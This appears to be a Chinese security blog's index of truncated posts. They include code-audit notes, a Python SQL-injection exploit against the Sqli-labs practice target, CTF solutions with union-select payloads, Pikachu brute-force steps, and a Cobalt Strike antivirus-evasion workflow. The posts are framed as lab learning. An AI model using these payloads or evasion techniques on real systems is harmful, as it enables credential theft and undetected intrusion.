BlueCMS代码审计
Bluecms代码审计Bluecms代码审计之union联合查询注入先把我们的源码下载好,并且搭建好
打开我们的Seay源代码审计系统,把源码丢进去自动审计一下
我们可以看到这里第一条就是可能存在SQL注入的地方,点进去看看
我们可以继续跟踪一下这个函数,函数代码如下
123456789101112131415function deep_addslashes($str){ if(is_array($str)) { foreach($str as $key=>$val) { $str[$key] = deep_addslashes($val); } } else { $str = addslashes($str); } return $str;}
这函数定义的大概意思就是如果传进来的参数是数组,每个过滤一下,如果不是,就直接对传进来的参数先经过一下addslashes这个函数,也就是对某些特殊字符进行转义
我们继续回到漏洞可能存在的ad_js.php进行分析
这里判断了是否有传入a ...
个人exp编写练习
Exp编写GET类型的SQL注入exp编写最近学了点Python基础,准备拿Python来作为以后编写exp&poc的语言
今天就拿了Sqli-labs第一关入手,这里是get类型的sql注入exp编写
具体的exp如下
123456789import requestsimport reurl='http://sql.com/Less-1/'payload="?id=-1' union select 1,group_concat('~',username,',',password,'~'),3 from users --+"all = str(url) + str(payload)res = requests.get(all)text=res.textresult=re.findall('~(.*?)~',text)print(result)
引入re和requests的库,然后初始化好我们的payload
这里把url和payload拼接好,先转 ...
CTFSHOW之WEB入门1000题
web1
右键查看源代码就出来了
1ctfshow{e79b78ff-0134-4bd5-8427-5df9b427ba51}
web2这题无法通过右键查看源代码,我们在输入view-source://url
flag就出来了
1ctfshow{b76468eb-fcaa-4d81-b4c9-5dee9916aa14}
web3
提示抓个包,我们抓了个包然后发个包,flag就出来了
1ctfshow{05cb5280-6799-45cd-91ce-8f40d15f556b}
web4提示robots文件,我们手动访问
12User-agent: *Disallow: /flagishere.txt
然后访问flagishere.txt
1ctfshow{b797b9e8-3dab-4c51-9c08-ca397f3b2e5d}
web5提示phps源码泄露,访问index.phps可以下载源文件
12345678910111213141516<?php/*# -*- coding: utf- ...
CTFSHOW题目练习
ctfshow刷题记录WEBweb签到题
右键查看源代码
base64解码
1ctfshow{ba096492-60a2-4c59-a9be-c209e053375c}
web2
一看是SQL注入,应该是union联合查询,先看他回显位,再一步步查他的库,表,列,字段值,这里发现回显位是第二个,所以构造payload
1231' union select 1,(table_name),3 from information_schema.tables where table_schema=database() # 查表1' union select 1,(column_name),3 from information_schema.columns where table_name='flag' 1' union select 1,flag,3 from flag #
1ctfshow{ad3aed6a-eea1-469b-bdba-1d5a37290838}
web3
提示 ...
内网渗透学习笔记
隧道技术SSH隧道ssh 用于登录远程主机, 并且在远程主机上执行命令. 它的目的是替换 rlogin 和 rsh, 同时在不安全的网络之上, 两个互不 信任的主机之间, 提供加密的, 安全的通信连接. X11 连接和任意 TCP/IP 端口均可以通过此安全通道转发(forward).当用户通过 连接并登录主机 hostname 后, 根据所用的协议版本, 用户必须通过下述方法之一向远程主机证明他/她的身份:
参数
-a 禁止转发认证代理的连接.
-A 允许转发认证代理的连接. 可以在配置文件中对每个主机单独设定这个参数. 代理转发须谨慎. 某些用户能够在远程主机上绕过文件访问权限 (由于代理的 UNIX 域 socket), 他们可以通过转发的连接访问本地代理. 攻击者不可能从代理获得密钥内容, 但是他们能够操作这些密钥, 利用加载到代理上 的身份信息通过认证.
-b bind_address 在拥有多个接口或地址别名的机器上, 指定收发接口.
-c blowfish|3des|des 选择加密会话的密码术. 3des 是默认算法. 3des (triple-de ...
熊海CMS1.0代码审计
熊海CMS1.0代码审计熊海CMS1.0代码审计之反射型XSS首先打开Seay审计系统,把我们的xhcms丢进去审计一下,我们这里是要找XSS,我们直接搜索关键字echo,看看有没有可以利用的地方
我们这里审计漏洞必须同时满足参数可控和危险函数两个条件,echo就是一个,我们这里需要找可控变量,如果变量不可控我们没法对他进行利用,因为我们这里先看了一下index.php,发现他是通过传一个参数进去,自动拼接.php来访问files目录下的文件,所以这里可能会有文件包含漏洞,我们在下面会讲,这里只是先说明他前台的功能点应该都在files文件夹下,我们直接审计files目录下的文件即可
1234567<?php//单一入口模式error_reporting(0); //关闭错误显示$file=addslashes($_GET['r']); //接收文件名$action=$file==''?'index':$file; //判断为空或者等于indexinclude('files/'.$action. ...
CS免杀姿势分享(等待更新)
Cobaltstrike简介CobatStrike是一款基于java编写的全平台多方协同后渗透攻击框架。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节。
Cobaltstrike各种免杀姿势暗月内部系统的bypassAv最近入了暗月的全栈渗透测试培训,里面有个内部系统,其中就有个bypassAv
今天心血来潮尝试了一下,发现是真的香,话不多说,直接开始。
首先使用 cobal strike payload 生成 64位 c#
直接编辑生成出来的payload.cs
我们只取{}中的十六进制代码,把shellcode复制到我们的bypassAv后可以自动生成一个exe
这里拿我自己本机来测试,主机成功上线
Nim语言免杀部署Nim环境官网/下载地址:https://nim-lang.org/install.html
选择对应的版本,下载以后解压,复制bin目录地址,把bin目录地址添加到环境变量,打开cmd,输入nim,如下图则成功
安装C、C++编译器Nim编译器需 ...
数据库基础学习
数据库学习01 Mysql数据库的基本操作数据库的基本操作1234567891011121314151617181920输入 mysql -uroot -p -P3306 -h127.0.0.1退出的三种方法 mysql > exit; mysql > quit; mysql > \q; 增:create database db1; 删:drop database db1; 改:alter database db1 charset utf8 查:show databases;#查看所有的数据库 show create database db1;查看指定的数据库 show status; -- 显示一些系统特定资源的信息,例如,正在运行的线程数量。 desc tabl_name; 显示表结构,字段类型,主键,是否为空等属性,但不显示外键。 show databases 查看这个mysql里面有多少个库 show tables 查看当前库里面所有的表 mysql> select password from user where user= ...
pikachu靶场部分通关手册(持续更新中)
最近发现,之前学的各种东西已经比较生疏了,所以重新来通关一个靶场来回忆一下
暴力破解基于表单的暴力破解
看到这个,再看到题目名字,直接使用burp中的爆破功能,我们抓取他登陆的包
然后导入我们的字典,开始爆破,成功得出账号密码分别是admin和123456
验证码绕过(on server)1.保持bp的抓包状态,随便输入账号和密码,先不输入验证码。
2.打开bp,右击选择send to repeater,把请求发送到 repeater
3.打开Repeater,点击GO,观察状态。
4.这时,右侧会显示验证码不能为空,因为此前没有输入验证码
5.如果随便输入一个验证码,此时显示验证码错误!
6.然后把pikachu平台中的正确的验证码输入进去,则显示账号或密码错误!说明了后台会把提交的验证码进行验证,看是否正确,接下来进行暴力破解!
7.然后把pikachu平台中的正确的验证码输入进去,则显示账号或密码错误!说明了后台会把提交的验证码进行验证,看是否正确,接下来进行暴力破解!步骤和基于表单的暴力破解是一样。将Proxy中抓到的,右击发送到Intruder,然后添加账户和密码变量, ...
C++通讯录课设寻求帮助中
最近在忙着数据结构的课设,我的课设是通讯录的制作,就差最后一个load()函数从外部导入数据到程序,遇到问题了,有没有大佬能帮俺看看
设计目的:用〈〈数据结构〉〉中的双向链表作数据结构,结合C语言基本知识。编写一个通讯录管理系统。以把所学数据结构知识应用到实际软件开发中去。
设计内容:本系统应完成一下几方面的功能:
1)输入信息——enter();
2)显示信息———display( );
3)查找以姓名作为关键字 ———search( );
4)删除信息———delete( );
5)存盘———save ( );
6)装入———load( ) ;
设计要求:
1)每条信息至包含 :姓名(NAME )街道(STREET)城市(CITY)邮编(EIP)国家(STATE)几项
2)作为一个完整的系统,应具有友好的界面和较强的容错能力
3)上机能正常运行,并写出课程设计报告
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596 ...